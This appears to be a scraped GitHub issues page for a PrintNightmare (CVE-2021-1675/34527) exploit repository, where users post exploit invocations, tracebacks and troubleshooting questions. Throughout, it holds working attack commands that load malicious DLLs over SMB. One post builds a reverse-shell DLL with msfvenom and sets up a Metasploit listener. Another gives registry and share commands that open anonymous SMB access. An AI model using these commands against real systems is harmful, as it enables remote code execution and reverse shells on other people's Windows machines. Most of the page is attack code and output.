cube0x0 / cve-2021-1675 Goto Github PK
View Code? Open in Web Editor NEWC# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527
C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527
$ python .\CVE-2021-1675.py ignite.local/techuser:[email protected] "\10.10.10.155\share\meter.dll"
[] Try 1...
[] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[] Executing \10.10.10.155\share\meter.dll
[] Stage0: 0
[] Try 2...
[] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[] Executing \10.10.10.155\share\meter.dll
[] Stage0: 0
[] Try 3...
[] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[] Executing \10.10.10.155\share\meter.dll
[] Stage0: 0
Dll doesnt get executed
Traceback (most recent call last):
File "/home/kali/github/CVE-2021-1675/CVE-2021-1675.py", line 117, in
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
File "/home/kali/github/CVE-2021-1675/CVE-2021-1675.py", line 53, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 614, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
Running remotely against a Windows 10 host.
Running the exploit successfully drops the malicious DLL in C:\Windows\System32\spool\drivers\x64\3
. However, the "backup" process in the exploit write-up does not appear to be happening. C:\Windows\System32\spool\drivers\x64\3\old
never appears to exist, resulting in RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified.
errors when trying to execute the dll.
I have tried changing the pConfigFile to point at the .dll that I know exists:
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename)
But this results in what I believe is expected from the original writeup:
RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION - The process cannot access the file because it is being used by another process.
For the remote exploits, do you still need the same SMB configuration as you would with the Python script (either samba or the silly Windows share config)?
I have my share configured as mentioned in the python script readme, and I have tried running the remote as current context and remote runas against the DC using the path mentioned in the help menu and was getting Windows error code 1801. I also tried it against a generic share (not configured for null session, but Anonymous and Everyone have Read Access) and got the same 1801 error.
I switched the file to the one on the DC which has a slightly different path (amd64_7b3eed059f4c3e41) and was still getting windows error code 1801 on all attempts.
(same results in remote and runas)
[*] Try 1...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
[*] Executing '\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801
[*] Try 2...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
[*] Executing '\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801
[*] Try 3...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
[*] Executing '\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801
[*] Try 1...
[*] pDriverPath
'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801
[*] Try 2...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801`
Hello,
After investigating about this exploit, I've seen that the vulnerability CVE-2021-1675 was fully patched with the June 2021 security update. If this exploit is still working it is because it is exploiting the CVE-2021-34527. Can you confirm it, please?
Sources:
https://nakedsecurity.sophos.com/2021/07/07/printnightmare-official-patch-is-out-update-now/
https://nakedsecurity.sophos.com/2021/07/16/more-printnightmare-we-told-you-not-to-turn-the-print-spooler-back-on/
https://www.tenable.com/blog/cve-2021-34527-microsoft-releases-out-of-band-patch-for-printnightmare-vulnerability-in-windows
I want to create a anonymous smb server at windows which in a domain, but it need domain administrator authentication.
if I create a anonymous smb server Outside the domain, I can't access the smb directory from my domain control server.
So how do I create an smb service that allows anonymous access without requiring domain administrator authentication ?
this is full error
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x45a - ERROR_DLL_INIT_FAILED - A dynamic link library (DLL) initialization routine failed.
i am trying this exploit on windows 10 . there is no dc can anyone help
└─# python3 CVE-2021-1675.py domain.com/sird:[email protected] \192.168.189.131\smb\shell.dll
[*] Connecting to ncacn_np:192.168.189.128[\PIPE\spoolss]
[-] Connection Failed
Anyone how to fix this issues? i was not able to connect to my windows server 2019.
The C# exp error:
Unhandled Exception: System.IO.FileNotFoundException: Could not load file or assembly 'System.Core, Version=4.0.0.0, Culture=neutral, Public
KeyToken=b77a5c561934e089' or one of its dependencies. The system cannot find the path specified.
at SharpPrintNightmare.Program.getDrivers(String computername)
at SharpPrintNightmare.Program.Main(String[] args)
Target Framework is set to 4.0
it seems to be working on members server and workstation only when UAC is off . ( rpc access denied on rpcaddprinterdriverex )
work as-in on a DC
any info about that ?
maybe something on rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000 ?
what problem did i have as described below when i ran the exploit.
_```
uring handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/tmp/CVE-2021-1675.py", line 176, in <module>
main(dce, pDriverPath, options.share)
File "/tmp/CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 857, in request
answer = self.recv()
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1308, in recv
response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 547, in recv
return self.__smb_connection.readFile(self.__tid, self.__handle)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 597, in readFile
bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1975, in read_andx
return self.read(tid, fid, offset, max_size, wait_answer)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1310, in read
ans = self.recvSMB(packetID)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 454, in recvSMB
data = self._NetBIOSSession.recv_packet(self._timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 914, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 1001, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 985, in non_polling_read
raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out._
Hope to get help from seniors. Thank you. <3 <3 <3
sudo python3 CVE-2021-1675.py test.local/chen:[email protected] '\192.168.121.128\smb\reverse.dll'
[] Connecting to ncacn_np:192.168.121.165[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[] Executing ??\UNC\192.168.121.128\smb\reverse.dll
[*] Try 1...
Traceback (most recent call last):
File "/home/kali/CVE-2021-1675.py", line 188, in
main(dce, pDriverPath, options.share)
File "/home/kali/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.
Start SMB server with Impacket:
sudo examples/smbserver.py -smb2support -ts smb /xxx/PrintNightmare/smb
Run exploit:
python CVE-2021-1675.py -port 445 'xxx/xxx:xxx/@xxx' '\10.33.69.214\smb\nightmare.dll' 'C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL'
Exploit log:
[*] Connecting to ncacn_np:xxx[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL
[*] Executing \\10.33.69.214\smb\nightmare.dll
[*] Try 1...
Traceback (most recent call last):
File "xxx/CVE-2021-1675-cube0x0/CVE-2021-1675.py", line 176, in <module>
main(dce, pDriverPath, options.share)
File "xxx/CVE-2021-1675-cube0x0/CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "xxx/CVE-2021-1675-cube0x0/venv/lib/python3.9/site-packages/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "xxx/CVE-2021-1675-cube0x0/venv/lib/python3.9/site-packages/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION - The process cannot access the file because it is being used by another process.
SMB log:
[2021-07-05 12:31:44] [*] Disconnecting Share(1:smb)
[2021-07-05 12:31:44] [*] Closing down connection (10.33.48.25,58737)
[2021-07-05 12:31:44] [*] Remaining connections []
[2021-07-05 12:31:48] [*] Incoming connection (10.33.48.25,57754)
[2021-07-05 12:31:48] [*] AUTHENTICATE_MESSAGE (\,xxx)
[2021-07-05 12:31:48] [*] User xxx\ authenticated successfully
[2021-07-05 12:31:48] [*] :::00::aaaaaaaaaaaaaaaa
[2021-07-05 12:31:49] [*] Connecting Share(1:smb)
Unimplemented dissector: SPOOLSS
Return code: Share mode on file conflict with open mode (0x00000020)
Is anyone familiar with this error?
Receiving this error when executing the script. The DLL is getting uploaded and is in the driver list, it exists at the filepath "C:\Windows\System32\spool\drivers\x64\3\MyDll.dll"
Output:
[] Connecting to ncacn_np:10.1.1.6[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[] Executing \10.1.1.5\smb\MyDll.dll
[*] Stage0: 0
RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified.
Server is Windows server 2019 Essentials
sudo python3 CVE-2021-1675.py test.local/chen:[email protected] '\192.168.121.128\smb\reverse.dll'
[] Connecting to ncacn_np:192.168.121.136[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_ce3301b66255a0fb\Amd64\UNIDRV.DLL
[] Executing ??\UNC\192.168.121.128\smb\reverse.dll
[] Try 1...
[] Stage0: 0
[] Try 2...
[] Stage0: 0
[*] Try 3...
Traceback (most recent call last):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 597, in readFile
bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1975, in read_andx
return self.read(tid, fid, offset, max_size, wait_answer)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1312, in read
if ans.isValidAnswer(STATUS_SUCCESS):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3structs.py", line 454, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been closed.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/kali/CVE-2021-1675.py", line 192, in
main(dce, pDriverPath, options.share)
File "/home/kali/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 857, in request
answer = self.recv()
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1308, in recv
response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 547, in recv
return self.__smb_connection.readFile(self.__tid, self.__handle)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 603, in readFile
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been closed.)
Getting an error
Traceback (most recent call last):
File "./rpcdump.py", line 23, in
from impacket.http import AUTH_NTLM
ImportError: No module named impacket.http
Followed install instructions exactly (kali). Google wasn't any help.
Hi,
I started SMB sharing as anonymous with SMBv2 support. Any user can access the SMB share and it works correctly in the DLL but I keep getting the following error. Do you have any advice?
[*] Try 1...
[*] Connecting to ncacn_np:192.168.237.131[\PIPE\spoolss]
[+] Bind OK
[*] Uploading \\192.168.237.130\share\a.dll
Traceback (most recent call last):
File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 117, in <module>
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 53, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 614, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x57 - ERROR_INVALID_PARAMETER - The parameter is incorrect.```
Hi
I m run this ,
SharpPrintNightmare.exe '\DESKTOP-BVJA\Users\F1\Desktop\share\rev.dll' '\192.168.100.135' pr.local user 123@qwe
and result is :
[-] Failed to enumerate printer drivers
Connecting to ncacn_np:*****[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
[] Executing ??\UNC***\share\reverse.dll
[] Try 1...
Traceback (most recent call last):
File "/home/kali/share/CVE-2021-1675-main/./CVE-2021-1675.py", line 188, in
main(dce, pDriverPath, options.share)
File "/home/kali/share/CVE-2021-1675-main/./CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: unknown error code: 0x180
┌──(kali㉿kali)-[~/share/CVE-2021-1675-main]
└─$ impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: unknown error code: 0x180 1 ⨯
Hi,
I am trying to use the RCE version of the exploit on an unpatched test environment with no success. The LPE attack works.
This is the result:
python3 CVE-2021-1675.py 'LAB/attacker:Password@victim_IP' '\\file_server_IP\nightmare\nightmare.dll'
[*] Connecting to ncacn_np:192.168.0.200[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.0.102\nightmare\nightmare.dll
[*] Try 1...
Traceback (most recent call last):
File "CVE-2021-1675.py", line 188, in <module>
main(dce, pDriverPath, options.share)
File "CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.6/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.6.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.6/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.6.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
Any help is appriciated.
mkdir C:\share
icacls C:\share\ /T /grant Anonymous` logon:r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
this is not working on windows 10 can you help me with this
──(king㉿Kali)-[~/CVE-2021-1675]
└─$ sudo python3 CVE-2021-1675.py genyu.com/wxh:[email protected] '\192.168.175.132\smb\rever.dll'
[] Connecting to ncacn_np:192.168.175.133[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[] Executing ??\UNC\192.168.175.132\smb\rever.dll
[] Try 1...
[] Stage0: 0
[*] Try 2...
Traceback (most recent call last):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 568, in writeFile
return self._SMBConnection.writeFile(treeId, fileId, data, offset)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1650, in writeFile
written = self.write(treeId, fileId, writeData, writeOffset, len(writeData))
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1358, in write
if ans.isValidAnswer(STATUS_SUCCESS):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3structs.py", line 454, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/king/CVE-2021-1675/CVE-2021-1675.py", line 190, in
main(dce, pDriverPath, options.share)
File "/home/king/CVE-2021-1675/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 856, in request
self.call(request.opnum, request, uuid)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 845, in call
return self.send(DCERPC_RawCall(function, body.getData(), uuid))
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1298, in send
self._transport_send(data)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1235, in _transport_send
self._transport.send(rpc_packet.get_packet(), forceWriteAndx = forceWriteAndx, forceRecv = forceRecv)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 535, in send
self.__smb_connection.writeFile(self.__tid, self.__handle, data)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 570, in writeFile
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)
PLEASE HELP ME!!!!
C:\Users\test\Desktop>SharpPrintNightmare.exe '\\100.100.100.102\share\mimilib.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL' '\\100.100.100.100'
[*] Try 1...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\\100.100.100.102\share\mimilib.dll'
[*] Stage 0: 1801
[*] Try 2...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\\100.100.100.102\share\mimilib.dll'
[*] Stage 0: 1801
[*] Try 3...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\\100.100.100.102\share\mimilib.dll'
[*] Stage 0: 1801
doesn't seem to work,wirkshark also did not catch the traffic
I did it on virtualized environment using the Poc you provided. However it always ends with "Stage0:0". Am I missing any step? When using process monitor I see my dll has been included but nothing happens. Thank you very much.
I probably can use the ports 139 445. I can only use the ones above 1024, it works with port 56970 for creating the smb server but not for the exploit: CVE-2021-1675.py: error: argument -port: invalid choice: '56970' (choose from '139', '445')
what can i do?
sudo python3 CVE-2021-1675.py TEST/administrator:[email protected] '\192.168.121.128\smb\reverse.dll' 'C:\Windows\System32\spool\drivers\x64\3\UNIDRV.DLL'
[] Connecting to ncacn_np:192.168.121.164[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\spool\drivers\x64\3\UNIDRV.DLL
[] Executing \192.168.121.128\smb\reverse.dll
[*] Try 1...
Traceback (most recent call last):
File "/home/kali/CVE-2021-1675.py", line 176, in
main(dce, pDriverPath, options.share)
File "/home/kali/CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION - The process cannot access the file because it is being used by another process.
Hitting this error,
Target Server 2016 Datacenter
root@kali:~/Desktop/CVE-2021-1675# python3 CVE-2021-1675.py 'testdomain.local/username:P@[email protected]' '\\172.31.30.112\smb\printer22.dll'
[*] Try 1...
[*] Connecting to ncacn_np:172.31.35.104[\PIPE\spoolss]
[+] Bind OK
[*] Uploading \\172.31.30.112\smb\printer22.dll
Traceback (most recent call last):
File "CVE-2021-1675.py", line 119, in <module>
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
File "CVE-2021-1675.py", line 55, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/rprn.py", line 614, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified.
Hello,
in my lab environment I set a small private network with my Kali Linux (latest version), 192.168.145.128, with a samba share correctly configured, and a Windows 10 machine x64 (192.168.145.1) where I would like to inject the malicious dll (a classic shell reverse tcp), by:
msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=192.168.145.128 LPORT=443 -o /tmp/reverse.dll
I can ping both of the machines on each side of them.
The PrintSpooler service is running on Windows and from Windows, the Linux smb share can be reached with no issues. Th Linux machine does not have ufw installed and iptables list is:
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Then, I start a listener on Kali machine by using Metasploit:
msf5 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp
PAYLOAD => windows/x64/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.145.128
LHOST => 192.168.145.128
msf5 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.145.128:443
When I execute the CVE-2021-1675 python script, the output is:
kali@kali:~$ sudo python3.8 CVE-2021-1675.py myusername:[email protected] '\\192.168.145.128\smb\reverse.dll'
[*] Connecting to ncacn_np:192.168.145.1[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_c62e9f8067f98247\Amd64\UNIDRV.DLL
[*] Executing \\192.168.145.128\smb\reverse.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
[*] Stage0: 0
But on the listener nothing happens. I don't think the .dll is caught by the Windows Antivirus because I inserted it in exclusion.
What could be the issue? How can I solve?
Thank you
hi, i tried to run the python script via windows cmd , and linux ubuntu 20 WSL both result in the same error
